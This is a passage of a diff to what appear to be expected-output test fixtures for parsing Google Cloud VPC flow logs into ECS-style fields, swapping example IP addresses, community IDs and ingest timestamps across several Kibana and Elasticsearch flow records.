"{\"insertId\":\"198begsfh44xxz\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":34450,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392092100Z", + "original": 
"{\"insertId\":\"198begsfh44xxz\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34450,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:47:38.189569840Z", "end": "2019-06-14T03:47:38.299054333Z", @@ -16559,17 +16559,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 60122, "bytes": 1467, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:bqmZvpZBw56sKswuSbDTHXnb0TU=", + "community_id": "1:WGg0+cb+0s5Ex6XJLyeCaLPvkpg=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -16583,7 +16583,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -16608,8 +16608,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869038900Z", - "original": "{\"insertId\":\"198begsfh44xxy\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":60122},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392095500Z", + "original": 
"{\"insertId\":\"198begsfh44xxy\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60122},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:41:39.087226326Z", "end": "2019-06-14T03:41:39.207635184Z", @@ -16632,9 +16632,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 53879, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -16648,7 +16648,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:RJnXD8bwo6xYMLMKaPN85qjHcdQ=", + "community_id": "1:AkCFUf83/4ycKxpQQkP7p7l9aqs=", "bytes": 102119, "transport": "tcp", "type": "ipv4", @@ -16663,7 +16663,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -16687,8 +16687,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869042Z", - "original": "{\"insertId\":\"198begsfh44xxu\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":53879,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"176\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392099800Z", + "original": 
"{\"insertId\":\"198begsfh44xxu\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53879,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"176\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760414869Z", "end": "2019-06-14T03:49:56.312105537Z", @@ -16709,9 +16709,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 60968, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -16725,7 +16725,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:FaCnDl7uWc7lOELNsyeufwQIgPc=", + "community_id": "1:E0Auuo+7QQ3cb588odS6yJLxVyU=", "bytes": 1794, "transport": "tcp", "type": "ipv4", @@ -16740,7 +16740,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { 
@@ -16764,8 +16764,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869045100Z", - "original": "{\"insertId\":\"198begsfh44xxo\",\"jsonPayload\":{\"bytes_sent\":\"1794\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":60968,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392104200Z", + "original": 
"{\"insertId\":\"198begsfh44xxo\",\"jsonPayload\":{\"bytes_sent\":\"1794\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60968,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:43:39.653136947Z", "end": "2019-06-14T03:43:39.777977145Z", @@ -16792,17 +16792,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 60756, "bytes": 1467, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:4doByecCNk4FneiHUzTJOKA7tlc=", + "community_id": "1:uyxwjanUYILl+d9QoxpwFo8pJ48=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -16816,7 +16816,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -16841,8 +16841,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869048200Z", - "original": "{\"insertId\":\"198begsfh44xy0\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":60756},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392107800Z", + "original": 
"{\"insertId\":\"198begsfh44xy0\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":60756},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:43:10.912193869Z", "end": "2019-06-14T03:43:11.032929292Z", @@ -16871,17 +16871,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65275, "bytes": 67013, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 710 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:HecAvf3EWM638zAmzah9YroP5sc=", + "community_id": "1:pagRMjC+skHhrGE9uXpcDCyM7tk=", "bytes": 67013, "transport": "tcp", "type": "ipv4", @@ -16895,7 +16895,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -16920,8 +16920,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869051300Z", - "original": "{\"insertId\":\"198begsfh44xxw\",\"jsonPayload\":{\"bytes_sent\":\"67013\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65275},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"82\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392111800Z", + "original": 
"{\"insertId\":\"198begsfh44xxw\",\"jsonPayload\":{\"bytes_sent\":\"67013\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65275},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"82\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.565734921Z", "end": "2019-06-14T03:49:56.316847800Z", @@ -16944,9 +16944,9 @@ "as": { "number": 4837 }, - "address": "198.51.100.182", + "address": "67.43.156.14", "port": 14236, - "ip": "198.51.100.182" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -16960,7 +16960,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:41kwAuyQ+p5wBn7ppagdhPjfslw=", + "community_id": "1:qXQaZlrUFOCwuROMy7BhHqdjz/0=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -16975,7 +16975,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.182" + "67.43.156.14" ] }, "gcp": { 
@@ -16996,8 +16996,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869054600Z", - "original": "{\"insertId\":\"198begsfh44xy5\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"198.51.100.182\",\"dest_port\":14236,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:40:09.257387426Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392116100Z", + "original": 
"{\"insertId\":\"198begsfh44xy5\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":14236,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:40:09.257387426Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.247072525Z", "end": "2019-06-14T03:40:09.257387426Z", @@ -17024,18 +17024,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33542, "bytes": 64427, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 351 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:VPSH6E9LDgDYoGyFDhfUPu+Qrzg=", + "community_id": "1:o987u+FKYcH8IEcaicIttd58P5M=", "bytes": 64427, "name": "default", "transport": "tcp", @@ -17057,7 +17057,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -17094,8 +17094,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869057600Z", - "original": "{\"insertId\":\"19im82tfdygznq\",\"jsonPayload\":{\"bytes_sent\":\"64427\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33542},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"351\",\"reporter\":\"DEST\",\"rtt_msec\":\"173\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150870105Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392121100Z", + "original": 
"{\"insertId\":\"19im82tfdygznq\",\"jsonPayload\":{\"bytes_sent\":\"64427\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33542},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"351\",\"reporter\":\"DEST\",\"rtt_msec\":\"173\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150870105Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150870105Z", "end": "2019-06-14T03:49:59.565108524Z", @@ -17122,18 +17122,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 183366, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 242 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:nOR2MzlGdRdAPthTbrK2arYttrs=", + "community_id": "1:rnN2XV4CYsUrxmk67rUeU4blQzU=", "bytes": 183366, "name": "default", "transport": "tcp", @@ -17155,7 +17155,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -17192,8 +17192,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869060700Z", - "original": "{\"insertId\":\"19im82tfdygzn6\",\"jsonPayload\":{\"bytes_sent\":\"183366\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33690,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075665334Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392125800Z", + "original": 
"{\"insertId\":\"19im82tfdygzn6\",\"jsonPayload\":{\"bytes_sent\":\"183366\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33690,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075665334Z\"},\"logName\":\"projects/my-sample-project/logs